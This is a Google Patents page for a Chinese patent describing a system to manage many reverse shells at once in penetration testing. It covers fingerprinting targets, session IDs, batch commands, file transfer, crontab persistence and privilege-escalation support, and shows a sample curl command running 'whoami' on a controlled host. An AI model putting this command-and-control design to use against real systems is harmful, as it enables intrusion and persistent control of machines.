CN112307479B - Management method and system of rebound shell - Google Patents
Management method and system of rebound shell Download PDFInfo
- Publication number
- CN112307479B CN112307479B CN202011573773.0A CN202011573773A CN112307479B CN 112307479 B CN112307479 B CN 112307479B CN 202011573773 A CN202011573773 A CN 202011573773A CN 112307479 B CN112307479 B CN 112307479B
- Authority
- CN
- China
- Prior art keywords
- node
- target machine
- information
- session
- machine
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/566—Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/70—Protecting specific internal or peripheral components, in which the protection of a component leads to protection of the entire computer
- G06F21/71—Protecting specific internal or peripheral components, in which the protection of a component leads to protection of the entire computer to assure secure computing or processing of information
- G06F21/73—Protecting specific internal or peripheral components, in which the protection of a component leads to protection of the entire computer to assure secure computing or processing of information by creating or determining hardware identification, e.g. serial numbers
Abstract
The invention relates to a management method and a system of a rebound shell, which are characterized in that a server of a local monitoring port is established, fingerprint information of a target machine is collected after the rebound shell is connected, a unique corresponding Session-ID is generated for the target machine to distinguish different shell connections, and each node in the connection is maintained through a node information hash table, so that centralized management under the condition that a plurality of shells are interacted simultaneously can be realized, processing of various operation instructions can be realized, the requirements of security personnel in the process of penetration test of a large number of cloud servers and a large-scale intranet are well met, and the system has good applicability and flexibility.
Description
Technical Field
The invention relates to the technical field of network information security, in particular to a management method and a management system of a rebound shell.
Background
The bounce shell, that is, the control end monitors a certain TCP/UDP port of the control end, waits for the controlled end to initiate a request to the port, and then transfers the input and output of the command line of the controlled end to the control end, thereby realizing the connection control of the control end to the controlled end. The bounce Shell corresponds to standard shells such as telnet, ssh (Secure Shell protocol) and the like, and is essentially the role reversal of a client and a server of a network concept. This technique plays an important role in the process of penetration testing.
The bounce shell is generally used for situations that a firewall of a controlled end is limited, the authority is insufficient, a port is occupied and the like. An attacker attacks a target machine, opens a port of the target machine, and actively connects the target machine (target ip: target machine port) by the attacker according to the target ip, which is a relatively conventional connection form and is called forward connection. Remote desktops, web services, ssh, telnet, etc., are all forward connections. But a positive connection will catch the elbow in the following cases: a certain target machine is in a local area network and cannot be directly accessed; the ip of the target machine can be dynamically changed and cannot be continuously controlled; due to the limitation of a firewall and the like, the target machine can only send the request and cannot receive the request; for viruses, trojans, when the victim machine starts, when to connect, in what network environment, etc., are unknown. At the moment, the target machine is actively connected with the attacker machine in a shell rebounding mode, so that the dilemma caused by the fact that the target machine is not easy to find can be effectively overcome. However, with the rise of cloud computing and the rise of the internet of things, the number of hosts is rapidly increased, so that the complexity of a network environment is rapidly increased, and the difficulty of penetration testing work of security personnel using the rebound shell is increased.
Therefore, a management method and a management system for a resilient shell are needed to deal with security testing work in a large complex network environment.
Disclosure of Invention
The invention aims to provide a method and a system for managing a rebound shell, which can meet the requirement of penetration test of a large-scale complex network.
In order to achieve the purpose, the invention provides the following scheme:
a management method of a bounce shell comprises the following steps:
establishing a service program for monitoring a receiving port on a simulated attacker machine;
when the rebound shell information of a certain target machine is sent to the receiving port, collecting the fingerprint information of the target machine;
generating Session-ID of the target machine according to the fingerprint information of the target machine;
constructing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, and updating the node information hash table when receiving the rebound shell information of a new target machine;
collecting instructions of the simulated attacker machine;
and processing the instruction of the simulated attacker machine by using a queue.
The invention also provides a management system of the rebounding shell, which comprises the following steps:
the port monitoring module is used for establishing a service program for monitoring a receiving port on the simulated attacker machine;
the fingerprint collection module is used for collecting the fingerprint information of a certain target machine when the rebounding shell information of the target machine is sent to the receiving port;
the node management module is used for generating Session-ID of the target machine according to the fingerprint information of the target machine;
constructing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, and updating the node information hash table when receiving the rebound shell information of a new target machine;
the context processing module is used for collecting the instruction of the simulated attacker machine;
and the function processing module is used for processing the instruction of the simulated attacker machine by using the queue.
According to the specific embodiment provided by the invention, the invention discloses the following technical effects:
the invention provides a management method and a management system for a bounce shell, which realize the processing of the simultaneous interactive connection of a plurality of shells by establishing a node information hash table and dynamically updating the node hash table according to the situation of the bounce shell of a target machine; the rebounding shell messages of the target machines are managed through the queues, and the messages returned by the target machines can be received in series; the management method and the system for the rebound shell provided by the invention have strong functions, relate to a plurality of important steps in a safety test process, can meet the requirements of safety personnel in the penetration test of a large-scale complex intranet environment or an environment on the cloud, and are simple to operate, strong in practicability and easy to popularize.
Drawings
In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings needed in the embodiments will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments of the present invention, and it is obvious for those skilled in the art to obtain other drawings without creative efforts.
Fig. 1 is a schematic diagram of a bounce shell according to an embodiment of the present invention;
fig. 2 is a flowchart of a resilient shell management method according to an embodiment of the present invention;
fig. 3 is a block diagram of a bounce shell management system according to an embodiment of the present invention.
Detailed Description
The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the drawings in the embodiments of the present invention, and it is obvious that the described embodiments are only a part of the embodiments of the present invention, and not all of the embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.
The invention aims to provide a rebound shell management method and a rebound shell management system, which can manage the simultaneous interaction condition of a plurality of shells, solve the problem of pain point batch processing by security personnel in an infiltration test project, and particularly obviously improve the convenience of infiltration test when facing a large number of cloud servers and large-scale internal networks.
In order to make the aforementioned objects, features and advantages of the present invention comprehensible, embodiments accompanied with figures are described in further detail below.
Example 1
Bounce shells are a common function of security personnel during penetration testing. As shown in fig. 1, the simulated attacker machine monitors its own receiving port, and when the target machine sends a request to the receiving port, the simulated attacker machine establishes a session connection with the target machine, thereby implementing control of the simulated attacker machine on the target machine. In the field of network security, security personnel can simulate and attack a network to be tested through a simulation attacker machine, so that the anti-attack performance of the network to be tested is tested. However, when facing a target machine in a large complex network, a plurality of shells interact simultaneously, which brings inconvenience to the work of security personnel.
Therefore, as shown in fig. 2, the present embodiment provides a method for managing a resilient shell to solve the above problem, and specifically includes:
102, when the rebound shell information of a certain target machine is sent to the receiving port, collecting the fingerprint information of the target machine;
103, generating Session-ID of the target machine according to the fingerprint information of the target machine;
104, establishing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, and updating the node information hash table when the rebound shell information of a new target machine is received;
105, collecting the instruction of the simulated attacker machine;
and 106, processing the instruction of the simulated attacker machine by using the queue.
Therefore, according to the embodiment, the distinguishing of a plurality of different shells is realized by generating the unique corresponding Session-ID for each bounce shell, each node is maintained by a node hash table, and the command of the simulated attacker machine is processed by using the queue, so that the control test on a plurality of target machines is simultaneously performed in the penetration test process, and the processing capability in the face of a complex network environment is greatly improved.
When establishing a service for listening to a receiving port, the command: "Run 0.0.0.08080" sets up the snooping address and port information, at this time, the system returns the service program related information: "2020/07/0621: 27:51 Server running at: [ a18d2f29801c0d25e5b2c15117fad60f ] 0.0.0.0:2333 (0 online clients)".
After the monitoring service program is established, a request of active connection of a target machine is waited, when rebounding shell information of the target machine is sent to the monitored receiving port, a simulated attacker machine can acquire fingerprint information of the target machine and store the fingerprint information through a linked list, and if necessary, printing can be carried out through an info command. The fingerprint information specifically includes: processor model, mac address, network card information, operating system information, related vulnerability and patch information, related SDK information, and the like. At the moment, the shell connection of the simulation attacker machine is actively connected by the target machine between the simulation attacker machine and the target machine. In practical Application, different types of sessions can be established according to different requirements of a simulation attacker, for example, a conventional bounce shell or RESTful API (representational state transfer Application Programming Interface) type shell has good flexibility and practicability.
In order to better control the interaction condition of multiple shells, in this embodiment, each Session is distinguished by generating a unique Session-ID for each established Session. When generating the Session-ID, the fingerprint information of the target machine may be converted into binary data, the binary data may be hashed to obtain a hash value, and then the hash value may be used as the Session-ID of the target machine. Other methods for generating the session-ID may be used as long as different sessions can be distinguished.
And after the Session-ID is obtained, all the Session-IDs and the corresponding target machine fingerprint information are put into a hash table for management and maintenance. And export the data into an sql file at regular time so as to be convenient for arrangement and maintenance of the data in the process of penetration test. As in table 1, node information of a certain node is specifically shown.
TABLE 1 node information
After the node information hash table is established, in order to ensure the validity of the session, each shell connection needs to be detected regularly. And maintaining and updating the node information hash table in real time according to the detection result. And when detecting that the fingerprint information of the target machine changes, updating the corresponding node information in the node information hash table in time. When the current connection is detected to be interrupted, the corresponding node is removed as a zombie node, and the fingerprint information of the target machine corresponding to the node is exported and backed up in time, so that data support is provided for the penetration test, the security of network attack bearing is better analyzed, and targeted improvement is performed.
After a plurality of shells are connected, the control instruction of the simulated attacker can be processed in a queue mode. In order to make the management method provided by this embodiment better meet the actual requirements of the penetration test, some common functions in the penetration test are integrated when the control instruction is processed, such as establishment of a RESTful API interface, uploading and downloading of a file, batch processing execution of a command, smooth vim function support, sending of a linux kernel signal, related support for kernel right providing, execution of a crottab tool, and the like.
For the establishment of the RESTful API, the REST [ Host ] [ port ] "command form can be used for establishment, and the simulated attacker machine can realize the shell function by sending a request, such as the following instructions:
”curl -X POST
'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4'
--data 'cmd=whoami'“
the received return packet information is as follows:
{“status”:true,“msg”:”root”}。
and for the batch execution of the commands in the penetration test, simultaneously sending the same control commands to the related sessions in the node information hash table, receiving each return packet in series after the commands are executed, and outputting the execution results to a log file.
For the file uploading and downloading functions, file information can be received or written in through a socket, multithreading downloading can be achieved through an embedded axel module, meanwhile, compression of data streams is supported, the whole system is convenient to package, batch processing of files is further supported, accordingly, the downloading speed is increased, file management in a large-scale network is more suitable, and tasks of penetration testing are achieved more quickly and better.
The embodiment supports the sending of kernel signals while sending shell messages, and can provide functions such as CTRL-Z/C/V and the like so as to enhance interaction and use experience and enable the use of vim to be smoother and complete.
The management method provided by the embodiment can also add a task of regularly rebounding the target machine in the crontab, so that the connection effect with the target machine is better ensured.
When the kernel privilege-escalation related support command is processed, analysis needs to be performed on the basis of collected target machine fingerprints, the version of an operating system of the kernel privilege-escalation related support command, and the conditions of corresponding bugs and patches are analyzed, so that corresponding privilege-escalation codes are generated.
Of course, in this embodiment, only some common functions in the penetration test process are taken as an example to explain the specific instruction processing process, which does not mean that the shell management method can only implement the above functions, and any functions required in the penetration test process can be implemented by the present invention.
In order to meet different requirements in the penetration test process, the single node can be independently controlled and operated. The method can Jump to a connected node by using a command of ' Jump ' session ID ', and independently control a target machine of the node, thereby further improving the management flexibility.
Example 2
As another embodiment of the present invention, there is also provided a management system of a bounce shell, as shown in fig. 3, specifically including:
the port monitoring module M1 is used for establishing a service program for monitoring a receiving port on the simulated attacker machine;
the fingerprint collection module M2 is used for collecting the fingerprint information of a certain target machine when the bounce shell information of the target machine is sent to the receiving port;
the node management module M3 is used for generating Session-ID of the target machine according to the fingerprint information of the target machine;
constructing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, and updating the node information hash table when receiving the rebound shell information of a new target machine;
a context processing module M4, configured to collect instructions of the simulated attacker machine;
and the functional processing module M5 is used for processing the instruction of the simulated attacker machine by using the queue.
In order to better ensure the progress of penetration testing work, the system further comprises a client side link module M6, wherein the client side link module M6 is used for performing timing detection on each shell connection, and when detecting that the current connection is interrupted, the corresponding node is removed as a zombie node, and the fingerprint information of the target machine corresponding to the node is exported and backed up in time.
The emphasis of each embodiment in the present specification is on the difference from the other embodiments, and the same and similar parts among the various embodiments may be referred to each other. For the system disclosed by the embodiment, the description is relatively simple because the system corresponds to the method disclosed by the embodiment, and the relevant points can be referred to the method part for description.
The principles and embodiments of the present invention have been described herein using specific examples, which are provided only to help understand the method and the core concept of the present invention; meanwhile, for a person skilled in the art, according to the idea of the present invention, the specific embodiments and the application range may be changed. In view of the above, the present disclosure should not be construed as limiting the invention.
Claims (8)
1. A method for managing a resilient shell, the method comprising:
establishing a service program for monitoring a receiving port on a simulated attacker machine;
when the rebound shell information of a certain target machine is sent to the receiving port, establishing a session between the target machine and the service program, detecting the connection condition of the session at regular time, and collecting the fingerprint information of the target machine;
generating Session-ID of the target machine according to the fingerprint information of the target machine;
constructing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, updating the node information hash table when the rebound shell information of a new target machine is received, and removing the node information corresponding to the Session from the node information hash table when the Session connection interruption is detected;
collecting instructions of the simulated attacker machine;
and processing the instruction of the simulated attacker machine by using a queue, jumping to any node in the node information hash table, controlling a current node target machine to execute the instruction of the simulated attacker machine, and when the instruction of the simulated attacker machine is a command batch processing instruction, selecting each node related to the command batch processing instruction in the node hash table as a receiving node and sending the same control instruction to all the receiving nodes.
2. The method of claim 1, wherein when the session connection is detected to be broken, the node information corresponding to the session is removed from the node information hash table, and information of the target machine corresponding to the session is exported and backed up.
3. The method for managing resilient shell according to claim 1, wherein after collecting the fingerprint information of the target machine, storing the fingerprint information of the target machine using a linked list.
4. The method for managing an bounce shell according to claim 1, wherein the generating a Session-ID of the target machine according to the fingerprint information of the target machine specifically comprises:
converting the fingerprint information of the target machine into binary data;
carrying out hash processing on the binary data to obtain a hash value;
and taking the hash value as the Session-ID of the target machine.
5. The method for managing the resilient shell according to claim 1, wherein after the node information hash table is constructed, the node information hash table is exported to an sql file.
6. The method for managing the resilient shell according to claim 1, further comprising receiving and recording a return result of each receiving node in series after sending the same control command to all receiving nodes.
7. The method for managing a resilient shell according to claim 1, wherein processing the instructions of the simulated attacker machine further comprises: uploading or downloading files, supporting kernel to carry out rights extraction, and establishing a RESTful API interface.
8. A management system for a bounce shell, the system comprising:
the port monitoring module is used for establishing a service program for monitoring a receiving port on the simulated attacker machine;
the fingerprint collection module is used for establishing a session between a target machine and the service program when the rebounding shell information of the target machine is sent to the receiving port, detecting the connection condition of the session at regular time and collecting the fingerprint information of the target machine;
the node management module is used for generating Session-ID of the target machine according to the fingerprint information of the target machine;
constructing a node information hash table by taking the fingerprint information and the Session-ID of the target machine as node information, updating the node information hash table when the rebound shell information of a new target machine is received, and removing the node information corresponding to the Session from the node information hash table when the Session connection interruption is detected;
the context processing module is used for collecting the instruction of the simulated attacker machine;
and the function processing module is used for processing the instruction of the simulated attacker machine by using the queue, jumping to any node in the node information hash table, controlling the current node target machine to execute the instruction of the simulated attacker machine, and when the instruction of the simulated attacker machine is a command batch processing instruction, selecting each node related to the command batch processing instruction in the node hash table as a receiving node and sending the same control instruction to all the receiving nodes.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202011573773.0A CN112307479B (en) | 2020-12-28 | 2020-12-28 | Management method and system of rebound shell |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202011573773.0A CN112307479B (en) | 2020-12-28 | 2020-12-28 | Management method and system of rebound shell |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN112307479A CN112307479A (en) | 2021-02-02 |
| CN112307479B true CN112307479B (en) | 2021-03-30 |
Family
ID=74487586
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202011573773.0A Active CN112307479B (en) | 2020-12-28 | 2020-12-28 | Management method and system of rebound shell |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN112307479B (en) |
Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104753955A (en) * | 2015-04-13 | 2015-07-01 | 成都双奥阳科技有限公司 | Interconnection auditing method based on rebound port Trojans |
Family Cites Families (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2017160760A1 (en) * | 2016-03-15 | 2017-09-21 | Carbon Black, Inc. | System and method for reverse command shell detection |
| CN110880983A (en) * | 2019-08-14 | 2020-03-13 | 奇安信科技集团股份有限公司 | Penetration testing method and device based on scene, storage medium and electronic device |
| CN110768950A (en) * | 2019-08-14 | 2020-02-07 | 奇安信科技集团股份有限公司 | Permeation instruction sending method and device, storage medium and electronic device |
| CN110677381B (en) * | 2019-08-14 | 2023-05-09 | 奇安信科技集团股份有限公司 | Penetration test method and device, storage medium and electronic device |
| CN111581645B (en) * | 2020-04-17 | 2023-08-15 | 北京墨云科技有限公司 | Iterative attack method of automatic penetration test system based on AI |
| CN111988302A (en) * | 2020-08-14 | 2020-11-24 | 苏州浪潮智能科技有限公司 | Method, system, terminal and storage medium for detecting rebound program |
-
2020
- 2020-12-28 CN CN202011573773.0A patent/CN112307479B/en active Active
Patent Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN104753955A (en) * | 2015-04-13 | 2015-07-01 | 成都双奥阳科技有限公司 | Interconnection auditing method based on rebound port Trojans |
Also Published As
| Publication number | Publication date |
|---|---|
| CN112307479A (en) | 2021-02-02 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11641343B2 (en) | Methods and systems for API proxy based adaptive security | |
| Gu et al. | Botminer: Clustering analysis of network traffic for protocol-and structure-independent botnet detection | |
| US8095983B2 (en) | Platform for analyzing the security of communication protocols and channels | |
| Natarajan et al. | NSDMiner: Automated discovery of network service dependencies | |
| US20170230336A1 (en) | Automated honeypot provisioning system | |
| EP3297248B1 (en) | System and method for generating rules for attack detection feedback system | |
| US20110016528A1 (en) | Method and Device for Intrusion Detection | |
| US9800593B2 (en) | Controller for software defined networking and method of detecting attacker | |
| CN112468518B (en) | Access data processing method and device, storage medium and computer equipment | |
| JP7388613B2 (en) | Packet processing method and apparatus, device, and computer readable storage medium | |
| US10212126B2 (en) | System for mediating connection | |
| CN107204965B (en) | Method and system for intercepting password cracking behavior | |
| JP6962374B2 (en) | Log analyzer, log analysis method and program | |
| CN111212117A (en) | Remote interaction method and device | |
| US8972543B1 (en) | Managing clients utilizing reverse transactions | |
| CN112307479B (en) | Management method and system of rebound shell | |
| Gasmelseed et al. | Traffic pattern–based load‐balancing algorithm in software‐defined network using distributed controllers | |
| US20140019610A1 (en) | Correlated Tracing of Connections through TDS | |
| KR101432326B1 (en) | Host posing network device and method thereof | |
| CN112637244A (en) | Threat detection method for common and industrial control protocols and ports | |
| Langthasa et al. | Classification of network traffic in LAN | |
| Bolanowski et al. | Anomalies detection in computer networks with the use of SDN | |
| US20230370482A1 (en) | Method for identifying successful attack and protection device | |
| Zhu et al. | Analysis of the Technologies for Host and Port Scanning | |
| CN115913608A (en) | Networking method and device, computer equipment and storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |